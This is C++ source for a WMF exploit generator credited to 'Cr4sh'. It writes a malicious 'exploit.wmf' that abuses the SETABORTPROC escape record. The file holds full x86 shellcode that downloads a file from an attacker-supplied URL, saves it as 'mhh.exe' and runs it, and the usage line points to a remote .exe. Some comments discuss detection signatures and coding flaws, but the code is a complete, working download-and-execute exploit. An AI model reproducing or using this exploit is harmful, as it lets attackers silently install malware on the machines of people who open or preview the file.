/****************************************
* *
* WMF DownloadFile exploit by Cr4sh *
* www.cr4sh.h15.ru *
* *
****************************************/
#include <iostream>
#include <tchar.h>
#include <windows.h>
#define FNAME "exploit.wmf"   // fixed output path, relative to the current directory
typedef BYTE uchar;           // raw-byte alias used for the three static tables below
// 28-byte WMF prefix: an 18-byte METAHEADER followed by the start of the first
// METARECORD. _tmain reinterprets it through PMETAHEADER / PMETARECORD and
// overwrites mtSize before writing. Read literally as little-endian fields:
//   mtType 0x0001, mtHeaderSize 0x0009, mtVersion 0x0300, mtSize 0xED (patched
//   at runtime), mtNoObjects 6, mtMaxRecord 0x3D, mtNoParameters 0;
//   record rdSize 0x11, rdFunction 0x0626 (META_ESCAPE), first parameter 0x0009
//   (the SETABORTPROC escape). The 26 06 09 00 sequence is the obvious static
//   detection anchor for files this generator produces.
static uchar header[] =
{
0x01,0x00,0x09,0x00,0x00,0x03,0xED,0x00
,0x00,0x00,0x06,0x00,0x3D,0x00,0x00,0x00
,0x00,0x00,0x11,0x00,0x00,0x00,0x26,0x06
,0x09,0x00,0x16,0x00
};
// Opaque binary payload copied verbatim into the output file between `header`
// and the URL argument (see _tmain). It is not decoded here; the one readable
// artifact is the trailing NUL-terminated ASCII string "mhh.exe" (the final
// bytes 0x6d 0x68 0x68 0x2e 0x65 0x78 0x65 0x00), which makes a usable static
// signature for generated files alongside the header's record bytes.
static uchar sc[]=
{
0xe9,0xcc,0x00,0x00,0x00,0x5f,0xe8,0x56
,0x00,0x00,0x00,0x89,0xc3,0x50,0x68,0x8e
,0x4e,0x0e,0xec,0xe8,0x60,0x00,0x00,0x00
,0x31,0xc9,0x66,0xb9,0x6f,0x6e,0x51,0x68
,0x75,0x72,0x6c,0x6d,0x54,0xff,0xd0,0x50
,0x68,0x36,0x1a,0x2f,0x70,0xe8,0x46,0x00
,0x00,0x00,0x31,0xc9,0x51,0x51,0x8d,0x37
,0x56,0x8d,0x77,0x08,0x56,0x51,0xff,0xd0
,0x53,0x68,0x98,0xfe,0x8a,0x0e,0xe8,0x2d
,0x00,0x00,0x00,0x51,0x57,0xff,0xd0,0x31
,0xc9,0x49,0x90,0x90,0x53,0x68,0x7e,0xd8
,0xe2,0x73,0xe8,0x19,0x00,0x00,0x00,0xff
,0xd0,0x55,0x56,0x64,0xa1,0x30,0x00,0x00
,0x00,0x8b,0x40,0x0c,0x8b,0x70,0x1c,0xad
,0x8b,0x68,0x08,0x89,0xe8,0x5e,0x5d,0xc3
,0x53,0x55,0x56,0x57,0x8b,0x6c,0x24,0x18
,0x8b,0x45,0x3c,0x8b,0x54,0x05,0x78,0x01
,0xea,0x8b,0x4a,0x18,0x8b,0x5a,0x20,0x01
,0xeb,0xe3,0x35,0x49,0x8b,0x34,0x8b,0x01
,0xee,0x31,0xff,0xfc,0x31,0xc0,0xac,0x38
,0xe0,0x74,0x07,0xc1,0xcf,0x0d,0x01,0xc7
,0xeb,0xf2,0x3b,0x7c,0x24,0x14,0x75,0xe1
,0x8b,0x5a,0x24,0x01,0xeb,0x66,0x8b,0x0c
,0x4b,0x8b,0x5a,0x1c,0x01,0xeb,0x8b,0x04
,0x8b,0x01,0xe8,0xe9,0x02,0x00,0x00,0x00
,0x31,0xc0,0x89,0xea,0x5f,0x5e,0x5d,0x5b
,0xc3,0xe8,0x2f,0xff,0xff,0xff,0x6d,0x68
,0x68,0x2e,0x65,0x78,0x65,0x00
};
// Six trailing bytes written last, directly after the URL string. They have
// the shape of a META_EOF record (rdSize 3, rdFunction 0) — presumably the
// WMF end-of-file record; not verified here.
static uchar end[] =
{
0x03,0x00,0x00,0x00,0x00,0x00
};
// Entry point. Writes FNAME ("exploit.wmf") in the current directory as the
// byte concatenation header | sc | argv[1] (without its NUL) | end, after
// patching METAHEADER.mtSize to the total length in 16-bit words. argv[1] is
// the URL embedded in the file; it is not validated or length-checked.
// Returns 0 on every path, including I/O failure (see the unchecked calls).
int _tmain(int argc, _TCHAR* argv[])
{
// Taken before the argc check: with argc == 1 this reads argv[argc], which is
// NULL by the C standard, and it is not dereferenced before the early return.
// The _TCHAR* -> char* assignment only compiles in non-UNICODE builds.
char *fname = argv[1];
printf("\n WMF download file exploit by Cr4sh\n"
" www.cr4sh.h15.ru\n"
" —————————————-\n");
if (argc < 2) {
printf(" USSAGE: \n"
" exploit.exe http://example.com/somefile.exe\n");
return 0;
}
// Reinterpret the static table as the WMF header and the record that follows
// it immediately (offset sizeof(METAHEADER)).
PMETAHEADER mh = (PMETAHEADER)&header;
PMETARECORD mr = (PMETARECORD)(header + sizeof(METAHEADER));
// mtSize is expressed in WORDs: total output byte length, integer-divided by 2.
mh->mtSize = (sizeof(header) + sizeof(sc) + sizeof(end) + strlen(fname)) / 2;
// Echo the (already patched) header and first-record fields.
printf(" HEADER \n"
" FileType : 0x%.4x\n"
" HeaderSize : 0x%.4x\n"
" FileSize : 0x%.8x\n"
" METARECORD \n"
" Size : 0x%.8x\n"
" Function : 0x%.4x\n",
mh->mtType, mh->mtHeaderSize, mh->mtSize, mr->rdSize, mr->rdFunction);
// OPEN_ALWAYS opens an existing file without truncating it, so a longer
// pre-existing FNAME would keep stale trailing bytes. The handle is never
// compared against INVALID_HANDLE_VALUE; dwShareMode and
// lpSecurityAttributes are passed as NULL (0).
HANDLE hf = CreateFile(FNAME, GENERIC_READ | GENERIC_WRITE, NULL, NULL, OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL, NULL);
DWORD written = 0;
// WriteFile results and `written` are ignored on every call: a failed or
// short write still reaches the "Done" message below.
WriteFile(hf, (LPCVOID)header, sizeof(header), &written, NULL);
WriteFile(hf, (LPCVOID)sc, sizeof(sc), &written, NULL);
// The URL is written without its terminating NUL; `end` follows directly.
WriteFile(hf, fname, strlen(fname), &written, NULL);
WriteFile(hf, (LPCVOID)end, sizeof(end), &written, NULL);
CloseHandle(hf);
printf(" Done, saved in %s\n", FNAME);
return 0;
}